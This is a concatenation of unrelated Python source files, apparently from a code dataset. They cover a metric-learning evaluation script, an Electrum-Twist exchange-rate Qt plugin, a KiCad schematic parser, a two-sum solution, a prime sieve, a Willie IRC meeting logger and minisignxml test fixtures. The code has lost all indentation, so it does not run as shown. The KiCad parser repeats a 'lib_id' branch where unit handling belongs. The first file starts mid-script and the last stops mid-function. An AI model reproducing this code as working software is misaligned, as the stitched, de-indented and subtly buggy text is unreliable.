parser.add_argument("--dtype", default = DECAY_TYPE, help="decay type", type = str)
parser.add_argument("--dptype", default = DECAY_PARAM_TYPE, help="decay parameter type", type = str)
args = parser.parse_args()
nk = len(K_SET)
if __name__ == '__main__':
FILE_ID = params2id(args.dataset, args.conv, args.ltype, args.m)
QUERY_FILE_ID = params2id(args.dataset, '*', '*', args.conv, args.ltype, '*', args.m, '*', '*')
print("file id : {}".format(FILE_ID))
print("query file id : {}".format(QUERY_FILE_ID))
CSV_DIR = RESULT_DIR+'metric/csv/'
PKL_DIR = RESULT_DIR+'metric/pkl/'
LOG_DIR = RESULT_DIR+'metric/log/'
SAVE_DIR = RESULT_DIR+'metric/save/%s/'%FILE_ID
create_muldir(PKL_DIR, CSV_DIR, LOG_DIR)
copy_dst_csv = CSV_DIR+FILE_ID+'.csv'
copy_dst_pkl = PKL_DIR+FILE_ID+'.pkl'
if os.path.exists(SAVE_DIR): remove_dir(SAVE_DIR)
if os.path.exists(copy_dst_csv): remove_file(copy_dst_csv)
if os.path.exists(copy_dst_pkl): remove_file(copy_dst_pkl)
pkl_files = glob.glob(PKL_DIR+QUERY_FILE_ID+'.pkl')
print(pkl_files)
if len(pkl_files)==0:
print("No such pkl files")
sys.exit()
best_file_id = os.path.basename(pkl_files[0])[:-4] # -.pkl'
best_performance = np.sum(read_pkl(pkl_files[0])['te_te_precision_at_k'])
for pkl_idx in range(len(pkl_files)):
file_id = os.path.basename(pkl_files[pkl_idx])[:-4] # -.pkl'
performance = np.sum(read_pkl(pkl_files[pkl_idx])['te_te_precision_at_k'])
print("performance : {} from {}".format(performance, file_id))
if performance > best_performance:
best_performance = performance
best_file_id = file_id
print("best performance : {} from {}".format(best_performance, best_file_id))
copy_file(CSV_DIR+best_file_id+'.csv', copy_dst_csv)
copy_file(PKL_DIR+best_file_id+'.pkl', copy_dst_pkl)
copy_dir(RESULT_DIR+'metric/save/'+best_file_id, SAVE_DIR)
# load data
datasetmanager = DATASETMANAGER_DICT[args.dataset]
dm_train, dm_val, dm_test = datasetmanager(args.ltype, nsclass=args.nsclass)
for v in [dm_train, dm_val, dm_test]: v.print_shape()
model = DeepMetric(dm_train, dm_val, dm_test, LOG_DIR+FILE_ID+'.log', args)
model.build()
model.set_up_train()
model.restore(save_dir=SAVE_DIR)
model.prepare_test()
for activate_k in ACTIVATE_K_SET_IMGNET:
performance_th = model.test_th(activate_k, K_SET)
performance_vq = model.test_vq(activate_k, K_SET)
write_pkl({'th' : performance_th, 'vq' : performance_vq}, path=PKL_DIR + FILE_ID+'_{}.pkl'.format(activate_k))
cwrite = CsvWriter2(2)
key_set = [
'test_nmi',
'te_te_suf',
'te_te_precision_at_k',
'te_te_recall_at_k'
]
for key in key_set:
cwrite.add_header(0, str(key)+"_th")
cwrite.add_header(1, str(key)+"_vq")
content = ''
if 'suf' in str(key): content = listformat(performance_th[key])
elif 'at_k' in str(key): content = listformat(performance_th[key])
else: content = performance_th[key]
cwrite.add_content(0, content)
content = ''
if 'suf' in str(key): content = listformat(performance_vq[key])
elif 'at_k' in str(key): content = listformat(performance_vq[key])
else: content = performance_vq[key]
cwrite.add_content(1, content)
cwrite.write(CSV_DIR+FILE_ID+'_{}.csv'.format(activate_k))
model.delete()
|
the-stack_106_23249 | import time
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from electrum_twist_gui.qt.util import *
from electrum_twist_gui.qt.amountedit import AmountEdit
from electrum_twist.twist import COIN
from electrum_twist.i18n import _
from decimal import Decimal
from functools import partial
from electrum_twist.plugins import hook
from exchange_rate import FxPlugin
from electrum_twist.util import timestamp_to_datetime
class Plugin(FxPlugin, QObject):
def __init__(self, parent, config, name):
FxPlugin.__init__(self, parent, config, name)
QObject.__init__(self)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(BLACK_FG)
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.exchange_rate()
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(BLUE_FG)
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(BLUE_FG)
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
@hook
def init_qt(self, gui):
for window in gui.windows:
self.on_new_window(window)
@hook
def do_clear(self, window):
window.fiat_send_e.setText('')
def on_close(self):
self.emit(SIGNAL('close_fx_plugin'))
def restore_window(self, window):
window.update_status()
window.history_list.refresh_headers()
window.fiat_send_e.hide()
window.fiat_receive_e.hide()
def on_quotes(self):
self.emit(SIGNAL('new_fx_quotes'))
def on_history(self):
self.emit(SIGNAL('new_fx_history'))
def on_fx_history(self, window):
'''Called when historical fx quotes are updated'''
window.history_list.update()
def on_fx_quotes(self, window):
'''Called when fresh spot fx quotes come in'''
window.update_status()
self.populate_ccy_combo()
# Refresh edits with the new rate
edit = window.fiat_send_e if window.fiat_send_e.is_last_edited else window.amount_e
edit.textEdited.emit(edit.text())
edit = window.fiat_receive_e if window.fiat_receive_e.is_last_edited else window.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.history_used_spot:
self.on_fx_history(window)
def on_ccy_combo_change(self):
'''Called when the chosen currency changes'''
ccy = str(self.ccy_combo.currentText())
if ccy and ccy != self.ccy:
self.set_currency(ccy)
self.hist_checkbox_update()
def hist_checkbox_update(self):
if self.hist_checkbox:
self.hist_checkbox.setEnabled(self.ccy in self.exchange.history_ccys())
self.hist_checkbox.setChecked(self.config_history())
def populate_ccy_combo(self):
# There should be at most one instance of the settings dialog
combo = self.ccy_combo
# NOTE: bool(combo) is False if it is empty. Nuts.
if combo is not None:
combo.blockSignals(True)
combo.clear()
combo.addItems(sorted(self.exchange.quotes.keys()))
combo.blockSignals(False)
combo.setCurrentIndex(combo.findText(self.ccy))
@hook
def on_new_window(self, window):
# Additional send and receive edit boxes
if not hasattr(window, 'fiat_send_e'):
send_e = AmountEdit(self.get_currency)
window.send_grid.addWidget(send_e, 4, 2, Qt.AlignLeft)
window.amount_e.frozen.connect(
lambda: send_e.setFrozen(window.amount_e.isReadOnly()))
receive_e = AmountEdit(self.get_currency)
window.receive_grid.addWidget(receive_e, 2, 2, Qt.AlignLeft)
window.fiat_send_e = send_e
window.fiat_receive_e = receive_e
self.connect_fields(window, window.amount_e, send_e, window.fee_e)
self.connect_fields(window, window.receive_amount_e, receive_e, None)
else:
window.fiat_send_e.show()
window.fiat_receive_e.show()
window.history_list.refresh_headers()
window.update_status()
window.connect(self, SIGNAL('new_fx_quotes'), lambda: self.on_fx_quotes(window))
window.connect(self, SIGNAL('new_fx_history'), lambda: self.on_fx_history(window))
window.connect(self, SIGNAL('close_fx_plugin'), lambda: self.restore_window(window))
window.connect(self, SIGNAL('refresh_headers'), window.history_list.refresh_headers)
def settings_widget(self, window):
return EnterButton(_('Settings'), partial(self.settings_dialog, window))
def settings_dialog(self, window):
d = WindowModalDialog(window, _("Exchange Rate Settings"))
layout = QGridLayout(d)
layout.addWidget(QLabel(_('Exchange rate API: ')), 0, 0)
layout.addWidget(QLabel(_('Currency: ')), 1, 0)
layout.addWidget(QLabel(_('History Rates: ')), 2, 0)
# Currency list
self.ccy_combo = QComboBox()
self.ccy_combo.currentIndexChanged.connect(self.on_ccy_combo_change)
self.populate_ccy_combo()
def on_change_ex(idx):
exchange = str(combo_ex.currentText())
if exchange != self.exchange.name():
self.set_exchange(exchange)
self.hist_checkbox_update()
def on_change_hist(checked):
if checked:
self.config.set_key('history_rates', 'checked')
self.get_historical_rates()
else:
self.config.set_key('history_rates', 'unchecked')
self.emit(SIGNAL('refresh_headers'))
def ok_clicked():
self.timeout = 0
self.ccy_combo = None
d.accept()
combo_ex = QComboBox()
combo_ex.addItems(sorted(self.exchanges.keys()))
combo_ex.setCurrentIndex(combo_ex.findText(self.config_exchange()))
combo_ex.currentIndexChanged.connect(on_change_ex)
self.hist_checkbox = QCheckBox()
self.hist_checkbox.stateChanged.connect(on_change_hist)
self.hist_checkbox_update()
ok_button = QPushButton(_("OK"))
ok_button.clicked.connect(lambda: ok_clicked())
layout.addWidget(self.ccy_combo,1,1)
layout.addWidget(combo_ex,0,1)
layout.addWidget(self.hist_checkbox,2,1)
layout.addWidget(ok_button,3,1)
return d.exec_()
def config_history(self):
return self.config.get('history_rates', 'unchecked') != 'unchecked'
def show_history(self):
return self.config_history() and self.ccy in self.exchange.history_ccys()
@hook
def history_tab_headers(self, headers):
if self.show_history():
headers.extend(['%s '%self.ccy + _('Amount'), '%s '%self.ccy + _('Balance')])
@hook
def history_tab_update_begin(self):
self.history_used_spot = False
@hook
def history_tab_update(self, tx, entry):
if not self.show_history():
return
tx_hash, height, conf, timestamp, value, balance = tx
if conf <= 0:
date = timestamp_to_datetime(time.time())
else:
date = timestamp_to_datetime(timestamp)
for amount in [value, balance]:
text = self.historical_value_str(amount, date)
entry.append(text)
|
the-stack_106_23250 | from dataclasses import dataclass, field
from kikit.sexpr import Atom, parseSexprF
from itertools import islice
import os
from typing import Optional
@dataclass
class Symbol:
uuid: Optional[str] = None
path: Optional[str] = None
unit: Optional[int] = None
lib_id: Optional[str] = None
in_bom: Optional[bool] = None
on_board: Optional[bool] = None
properties: dict = field(default_factory=dict)
@dataclass
class SymbolInstance:
path: Optional[str] = None
reference: Optional[str] = None
unit: Optional[int] = None
value: Optional[str] = None
footprint: Optional[str] = None
def getProperty(sexpr, field):
for x in islice(sexpr, 1, None):
if len(x) > 0 and \
isinstance(x[0], Atom) and x[0].value == "property" and \
isinstance(x[1], Atom) and x[1].value == field:
return x[2].value
return None
def isSymbol(sexpr):
if isinstance(sexpr, Atom) or len(sexpr) == 0:
return False
item = sexpr[0]
return isinstance(item, Atom) and item.value == "symbol"
def isSymbolInstances(sexpr):
if isinstance(sexpr, Atom) or len(sexpr) == 0:
return False
item = sexpr[0]
return isinstance(item, Atom) and item.value == "symbol_instances"
def isSheet(sexpr):
if isinstance(sexpr, Atom) or len(sexpr) == 0:
return False
item = sexpr[0]
return isinstance(item, Atom) and item.value == "sheet"
def isPath(sexpr):
if isinstance(sexpr, Atom) or len(sexpr) == 0:
return False
item = sexpr[0]
return isinstance(item, Atom) and item.value == "path"
def getUuid(sexpr):
for x in islice(sexpr, 1, None):
if x and x[0] == "uuid":
return x[1].value
return None
def extractSymbol(sexpr, path):
s = Symbol()
for x in islice(sexpr, 1, None):
if not x:
continue
key = x[0]
if not isinstance(key, Atom):
continue
key = key.value
if key == "lib_id":
s.lib_id = x[1].value
elif key == "lib_id":
s.unit = int(x[1].value)
elif key == "uuid":
s.uuid = x[1].value
s.path = path + "/" + s.uuid
elif key == "in_bom":
s.in_bom = x[1].value == "yes"
elif key == "on_board":
s.on_board = x[1].value == "yes"
elif key == "property":
s.properties[x[1].value] = x[2].value
return s
def extractSymbolInstance(sexpr):
s = SymbolInstance()
s.path = sexpr[1].value
for x in islice(sexpr, 2, None):
if not len(x) > 1:
continue
key = x[0]
if not isinstance(key, Atom):
continue
key = key.value
if key == "reference":
s.reference = x[1].value
elif key == "unit":
s.unit = int(x[1].value)
elif key == "value":
s.value = x[1].value
elif key == "footprint":
s.footprint = x[1].value
return s
def collectSymbols(filename, path=""):
"""
Crawl given sheet and return two lists - one with symbols, one with
symbol instances
"""
with open(filename) as f:
sheetSExpr = parseSexprF(f)
symbols, instances = [], []
for item in sheetSExpr.items:
if isSymbol(item):
symbols.append(extractSymbol(item, path))
continue
if isSheet(item):
f = getProperty(item, "Sheet file")
uuid = getUuid(item)
dirname = os.path.dirname(filename)
if len(dirname) > 0:
f = dirname + "/" + f
s, i = collectSymbols(f, path + "/" + uuid)
symbols += s
instances += i
continue
if isSymbolInstances(item):
for p in item.items:
if isPath(p):
instances.append(extractSymbolInstance(p))
continue
return symbols, instances
def getField(component, field):
return component.properties.get(field, None)
def getUnit(component):
return component.unit
def getReference(component):
return component.properties["Reference"]
def extractComponents(filename):
symbols, instances = collectSymbols(filename)
symbolsDict = {x.path: x for x in symbols}
assert len(symbols) == len(instances)
components = []
for inst in instances:
s = symbolsDict[inst.path]
# Note that s should be unique, so we can safely modify it
s.properties["Reference"] = inst.reference
s.properties["Value"] = inst.value
s.properties["Footprint"] = inst.footprint
s.unit = inst.unit
components.append(s)
return components
|
the-stack_106_23253 | """
Given an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.
You may assume that each input would have exactly one solution, and you may not use the same element twice.
You can return the answer in any order.
Example 1:
Input: nums = [2,7,11,15], target = 9
Output: [0,1]
Output: Because nums[0] + nums[1] == 9, we return [0, 1].
Example 2:
Input: nums = [3,2,4], target = 6
Output: [1,2]
Example 3:
Input: nums = [3,3], target = 6
Output: [0,1]
Constraints:
2 <= nums.length <= 10^3
-10^9 <= nums[i] <= 10^9
-10^9 <= target <= 10^9
Only one valid answer exists.
"""
from typing import List
class Solution1:
def twoSum(self, nums: List[int], target: int) -> List[int]:
hash_map = {}
for i, n in enumerate(nums):
if target - n in hash_map:
return [hash_map[target - n], i]
hash_map[n] = i
raise ValueError
|
the-stack_106_23254 | """
Creating prime sieve (optimized version).
.. module:: sieve_of_eratosthenes_optimized
:platform: Unix, Windows
:synopis: creating prime sieve
.. moduleauthor:: Thomas Lehmann <[email protected]>
=======
License
=======
Copyright (c) 2015 Thomas Lehmann
Permission is hereby granted, free of charge, to any person obtaining a copy of this
software and associated documentation files (the "Software"), to deal in the Software
without restriction, including without limitation the rights to use, copy, modify, merge,
publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies
or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import math
class sieve_of_eratosthenes_optimized(object):
"""Prime sieve."""
def __init__(self, max_n):
"""Initialize sieve."""
self.max_n = max_n
self.sieve = [True] * (self.max_n // 2 + 1)
self.sieve[0] = False
self.sieve[1] = True
def calculate(self):
"""Strike out all multiples of a prime as none prime."""
limit = int(math.sqrt(self.max_n))
value_i = 3
while value_i <= limit:
if self.sieve[value_i // 2]:
value_j = value_i ** 2
offset = 2 * value_i
while value_j <= self.max_n:
self.sieve[value_j // 2] = False
value_j += offset
value_i += 2
def get_primes(self):
"""
Get all primes.
:returns: list of primes
"""
return [2] + [n for n in range(3, self.max_n + 1, 2) if self.sieve[n // 2]]
def is_prime(self, value):
"""
Checking sieve for value.
It's expected that given value is a odd value since
the sieve does ignore even values.
:param value: value to be checked to be a prime.
:returns: True when given number is a prime.
"""
return self.sieve[value // 2]
|
the-stack_106_23255 | # coding=utf8
"""
meetbot.py - Willie meeting logger module
Copyright © 2012, Elad Alfassa, <[email protected]>
Licensed under the Eiffel Forum License 2.
This module is an attempt to implement at least some of the functionallity of Debian's meetbot
"""
from __future__ import unicode_literals
import time
import os
from willie.web import quote
from willie.modules.url import find_title
from willie.module import example, commands, rule, priority
from willie.tools import Ddict, Identifier
import codecs
def configure(config):
"""
| [meetbot] | example | purpose |
| --------- | ------- | ------- |
| meeting_log_path | /home/willie/www/meetings | Path to meeting logs storage directory (should be an absolute path, accessible on a webserver) |
| meeting_log_baseurl | http://example.com/~willie/meetings | Base URL for the meeting logs directory |
"""
if config.option('Configure meetbot', False):
config.interactive_add('meetbot', 'meeting_log_path', "Path to meeting logs storage directory (should be an absolute path, accessible on a webserver)")
config.interactive_add('meetbot', 'meeting_log_baseurl', "Base URL for the meeting logs directory (eg. http://example.com/logs)")
meetings_dict = Ddict(dict) # Saves metadata about currently running meetings
"""
meetings_dict is a 2D dict.
Each meeting should have:
channel
time of start
head (can stop the meeting, plus all abilities of chairs)
chairs (can add infolines to the logs)
title
current subject
comments (what people who aren't voiced want to add)
Using channel as the meeting ID as there can't be more than one meeting in a channel at the same time.
"""
meeting_log_path = '' # To be defined on meeting start as part of sanity checks, used by logging functions so we don't have to pass them bot
meeting_log_baseurl = '' # To be defined on meeting start as part of sanity checks, used by logging functions so we don't have to pass them bot
meeting_actions = {} # A dict of channels to the actions that have been created in them. This way we can have .listactions spit them back out later on.
#Get the logfile name for the meeting in the requested channel
#Used by all logging functions
def figure_logfile_name(channel):
if meetings_dict[channel]['title'] is 'Untitled meeting':
name = 'untitled'
else:
name = meetings_dict[channel]['title']
# Real simple sluggifying. This bunch of characters isn't exhaustive, but
# whatever. It's close enough for most situations, I think.
for c in ' ./\\:*?"<>|&*`':
name = name.replace(c, '-')
timestring = time.strftime('%Y-%m-%d-%H:%M', time.gmtime(meetings_dict[channel]['start']))
filename = timestring + '_' + name
return filename
#Start HTML log
def logHTML_start(channel):
logfile = codecs.open(meeting_log_path + channel + '/' + figure_logfile_name(channel) + '.html', 'a', encoding='utf-8')
timestring = time.strftime('%Y-%m-%d %H:%M', time.gmtime(meetings_dict[channel]['start']))
title = '%s at %s, %s' % (meetings_dict[channel]['title'], channel, timestring)
logfile.write('<!doctype html>\n<html>\n<head>\n<meta charset="utf-8">\n<title>%TITLE%</title>\n</head>\n<body>\n<h1>%TITLE%</h1>\n'.replace('%TITLE%', title))
logfile.write('<h4>Meeting started by %s</h4><ul>\n' % meetings_dict[channel]['head'])
logfile.close()
#Write a list item in the HTML log
def logHTML_listitem(item, channel):
logfile = codecs.open(meeting_log_path + channel + '/' + figure_logfile_name(channel) + '.html', 'a', encoding='utf-8')
logfile.write('<li>' + item + '</li>\n')
logfile.close()
#End the HTML log
def logHTML_end(channel):
logfile = codecs.open(meeting_log_path + channel + '/' + figure_logfile_name(channel) + '.html', 'a', encoding='utf-8')
current_time = time.strftime('%H:%M:%S', time.gmtime())
logfile.write('</ul>\n<h4>Meeting ended at %s UTC</h4>\n' % current_time)
plainlog_url = meeting_log_baseurl + quote(channel + '/' + figure_logfile_name(channel) + '.log')
logfile.write('<a href="%s">Full log</a>' % plainlog_url)
logfile.write('\n</body>\n</html>')
logfile.close()
#Write a string to the plain text log
def logplain(item, channel):
current_time = time.strftime('%H:%M:%S', time.gmtime())
logfile = codecs.open(meeting_log_path + channel + '/' + figure_logfile_name(channel) + '.log', 'a', encoding='utf-8')
logfile.write('[' + current_time + '] ' + item + '\r\n')
logfile.close()
#Check if a meeting is currently running
def ismeetingrunning(channel):
try:
if meetings_dict[channel]['running']:
return True
else:
return False
except:
return False
#Check if nick is a chair or head of the meeting
def ischair(nick, channel):
try:
if nick.lower() == meetings_dict[channel]['head'] or nick.lower() in meetings_dict[channel]['chairs']:
return True
else:
return False
except:
return False
#Start meeting (also preforms all required sanity checks)
@commands('startmeeting')
@example('.startmeeting title or .startmeeting')
def startmeeting(bot, trigger):
"""
Start a meeting.
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, there is already a meeting in progress here!')
return
if trigger.is_privmsg:
bot.say('Can only start meetings in channels')
return
if not bot.config.has_section('meetbot'):
bot.say('Meetbot not configured, make sure meeting_log_path and meeting_log_baseurl are defined')
return
#Start the meeting
meetings_dict[trigger.sender]['start'] = time.time()
if not trigger.group(2):
meetings_dict[trigger.sender]['title'] = 'Untitled meeting'
else:
meetings_dict[trigger.sender]['title'] = trigger.group(2)
meetings_dict[trigger.sender]['head'] = trigger.nick.lower()
meetings_dict[trigger.sender]['running'] = True
meetings_dict[trigger.sender]['comments'] = []
global meeting_log_path
meeting_log_path = bot.config.meetbot.meeting_log_path
if not meeting_log_path.endswith('/'):
meeting_log_path = meeting_log_path + '/'
global meeting_log_baseurl
meeting_log_baseurl = bot.config.meetbot.meeting_log_baseurl
if not meeting_log_baseurl.endswith('/'):
meeting_log_baseurl = meeting_log_baseurl + '/'
if not os.path.isdir(meeting_log_path + trigger.sender):
try:
os.makedirs(meeting_log_path + trigger.sender)
except Exception as e:
bot.say("Can't create log directory for this channel, meeting not started!")
meetings_dict[trigger.sender] = Ddict(dict)
raise
return
#Okay, meeting started!
logplain('Meeting started by ' + trigger.nick.lower(), trigger.sender)
logHTML_start(trigger.sender)
meeting_actions[trigger.sender] = []
bot.say('Meeting started! use .action, .agreed, .info, .chairs, .subject and .comments to control the meeting. to end the meeting, type .endmeeting')
bot.say('Users without speaking permission can use .comment ' +
trigger.sender + ' followed by their comment in a PM with me to '
'vocalize themselves.')
#Change the current subject (will appear as <h3> in the HTML log)
@commands('subject')
@example('.subject roll call')
def meetingsubject(bot, trigger):
"""
Change the meeting subject.
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
if not trigger.group(2):
bot.say('what is the subject?')
return
if not ischair(trigger.nick, trigger.sender):
bot.say('Only meeting head or chairs can do that')
return
meetings_dict[trigger.sender]['current_subject'] = trigger.group(2)
logfile = codecs.open(meeting_log_path + trigger.sender + '/' + figure_logfile_name(trigger.sender) + '.html', 'a', encoding='utf-8')
logfile.write('</ul><h3>' + trigger.group(2) + '</h3><ul>')
logfile.close()
logplain('Current subject: ' + trigger.group(2) + ', (set by ' + trigger.nick + ')', trigger.sender)
bot.say('Current subject: ' + trigger.group(2))
#End the meeting
@commands('endmeeting')
@example('.endmeeting')
def endmeeting(bot, trigger):
"""
End a meeting.
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
if not ischair(trigger.nick, trigger.sender):
bot.say('Only meeting head or chairs can do that')
return
meeting_length = time.time() - meetings_dict[trigger.sender]['start']
#TODO: Humanize time output
bot.say("Meeting ended! total meeting length %d seconds" % meeting_length)
logHTML_end(trigger.sender)
htmllog_url = meeting_log_baseurl + quote(trigger.sender + '/' + figure_logfile_name(trigger.sender) + '.html')
logplain('Meeting ended by %s, total meeting length %d seconds' % (trigger.nick, meeting_length), trigger.sender)
bot.say('Meeting minutes: ' + htmllog_url)
meetings_dict[trigger.sender] = Ddict(dict)
del meeting_actions[trigger.sender]
#Set meeting chairs (people who can control the meeting)
@commands('chairs')
@example('.chairs Tyrope Jason elad')
def chairs(bot, trigger):
"""
Set the meeting chairs.
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
if not trigger.group(2):
bot.say('Who are the chairs?')
return
if trigger.nick.lower() == meetings_dict[trigger.sender]['head']:
meetings_dict[trigger.sender]['chairs'] = trigger.group(2).lower().split(' ')
chairs_readable = trigger.group(2).lower().replace(' ', ', ')
logplain('Meeting chairs are: ' + chairs_readable, trigger.sender)
logHTML_listitem('<span style="font-weight: bold">Meeting chairs are: </span>' + chairs_readable, trigger.sender)
bot.say('Meeting chairs are: ' + chairs_readable)
else:
bot.say("Only meeting head can set chairs")
#Log action item in the HTML log
@commands('action')
@example('.action elad will develop a meetbot')
def meetingaction(bot, trigger):
"""
Log an action in the meeting log
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
if not trigger.group(2):
bot.say('try .action someone will do something')
return
if not ischair(trigger.nick, trigger.sender):
bot.say('Only meeting head or chairs can do that')
return
logplain('ACTION: ' + trigger.group(2), trigger.sender)
logHTML_listitem('<span style="font-weight: bold">Action: </span>' + trigger.group(2), trigger.sender)
meeting_actions[trigger.sender].append(trigger.group(2))
bot.say('ACTION: ' + trigger.group(2))
@commands('listactions')
@example('.listactions')
def listactions(bot, trigger):
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
for action in meeting_actions[trigger.sender]:
bot.say('ACTION: ' + action)
#Log agreed item in the HTML log
@commands('agreed')
@example('.agreed Bowties are cool')
def meetingagreed(bot, trigger):
"""
Log an agreement in the meeting log.
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
if not trigger.group(2):
bot.say('try .action someone will do something')
return
if not ischair(trigger.nick, trigger.sender):
bot.say('Only meeting head or chairs can do that')
return
logplain('AGREED: ' + trigger.group(2), trigger.sender)
logHTML_listitem('<span style="font-weight: bold">Agreed: </span>' + trigger.group(2), trigger.sender)
bot.say('AGREED: ' + trigger.group(2))
#Log link item in the HTML log
@commands('link')
@example('.link http://example.com')
def meetinglink(bot, trigger):
"""
Log a link in the meeing log.
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
if not trigger.group(2):
bot.say('try .action someone will do something')
return
if not ischair(trigger.nick, trigger.sender):
bot.say('Only meeting head or chairs can do that')
return
link = trigger.group(2)
if not link.startswith("http"):
link = "http://" + link
try:
title = find_title(link)
except:
title = ''
logplain('LINK: %s [%s]' % (link, title), trigger.sender)
logHTML_listitem('<a href="%s">%s</a>' % (link, title), trigger.sender)
bot.say('LINK: ' + link)
#Log informational item in the HTML log
@commands('info')
@example('.info all board members present')
def meetinginfo(bot, trigger):
"""
Log an informational item in the meeting log
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
if not trigger.group(2):
bot.say('try .info some informative thing')
return
if not ischair(trigger.nick, trigger.sender):
bot.say('Only meeting head or chairs can do that')
return
logplain('INFO: ' + trigger.group(2), trigger.sender)
logHTML_listitem(trigger.group(2), trigger.sender)
bot.say('INFO: ' + trigger.group(2))
#called for every single message
#Will log to plain text only
@rule('(.*)')
@priority('low')
def log_meeting(bot, trigger):
if not ismeetingrunning(trigger.sender):
return
if trigger.startswith('.endmeeting') or trigger.startswith('.chairs') or trigger.startswith('.action') or trigger.startswith('.info') or trigger.startswith('.startmeeting') or trigger.startswith('.agreed') or trigger.startswith('.link') or trigger.startswith('.subject'):
return
logplain('<' + trigger.nick + '> ' + trigger, trigger.sender)
@commands('comment')
def take_comment(bot, trigger):
"""
Log a comment, to be shown with other comments when a chair uses .comments.
Intended to allow commentary from those outside the primary group of people
in the meeting.
Used in private message only, as `.comment <#channel> <comment to add>`
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not trigger.sender.is_nick():
return
if not trigger.group(4): # <2 arguements were given
bot.say('Usage: .comment <#channel> <comment to add>')
return
target, message = trigger.group(2).split(None, 1)
target = Identifier(target)
if not ismeetingrunning(target):
bot.say("There's not currently a meeting in that channel.")
else:
meetings_dict[trigger.group(3)]['comments'].append((trigger.nick, message))
bot.say("Your comment has been recorded. It will be shown when the"
" chairs tell me to show the comments.")
bot.msg(meetings_dict[trigger.group(3)]['head'], "A new comment has been recorded.")
@commands('comments')
def show_comments(bot, trigger):
"""
Show the comments that have been logged for this meeting with .comment.
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
return
if not ischair(trigger.nick, trigger.sender):
bot.say('Only meeting head or chairs can do that')
return
comments = meetings_dict[trigger.sender]['comments']
if comments:
msg = 'The following comments were made:'
bot.say(msg)
logplain('<%s> %s' % (bot.nick, msg), trigger.sender)
for comment in comments:
msg = '<%s> %s' % comment
bot.say(msg)
logplain('<%s> %s' % (bot.nick, msg), trigger.sender)
meetings_dict[trigger.sender]['comments'] = []
else:
bot.say('No comments have been logged.')
|
the-stack_106_23256 | import datetime
import shutil
from dataclasses import dataclass
from pathlib import Path
from subprocess import check_output
from typing import Callable, Tuple
import pytest
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.asymmetric.rsa import RSAPrivateKeyWithSerialization
from cryptography.hazmat.primitives.serialization import (
Encoding,
NoEncryption,
PrivateFormat,
)
from cryptography.x509 import Certificate, NameOID
from lxml.etree import Element
from minisignxml.config import SigningConfig
from minisignxml.internal import utils
from minisignxml.internal.constants import *
from minisignxml.internal.namespaces import ds
@pytest.fixture
def xmlsec1():
path = shutil.which("xmlsec1") or shutil.which("xmlsec1.exe")
if not path:
raise pytest.skip("xmlsec1 not found")
def execute(*args):
return check_output((path,) + args)
return execute
@dataclass(frozen=True)
class KeyAndCert:
tmp_path: Path
private_key: RSAPrivateKeyWithSerialization
certificate: Certificate
def files(self) -> Tuple[str, str]:
pk_pem_path = self.tmp_path / "pk.pem"
cert_pem_path = self.tmp_path / "cert.pem"
with pk_pem_path.open("wb") as fobj:
fobj.write(
self.private_key.private_bytes(
Encoding.PEM, PrivateFormat.PKCS8, NoEncryption()
)
)
with cert_pem_path.open("wb") as fobj:
fobj.write(self.certificate.public_bytes(Encoding.PEM))
return str(pk_pem_path), str(cert_pem_path)
@pytest.fixture
def key_factory() -> Callable[[], Tuple[RSAPrivateKeyWithSerialization, Certificate]]:
def factory():
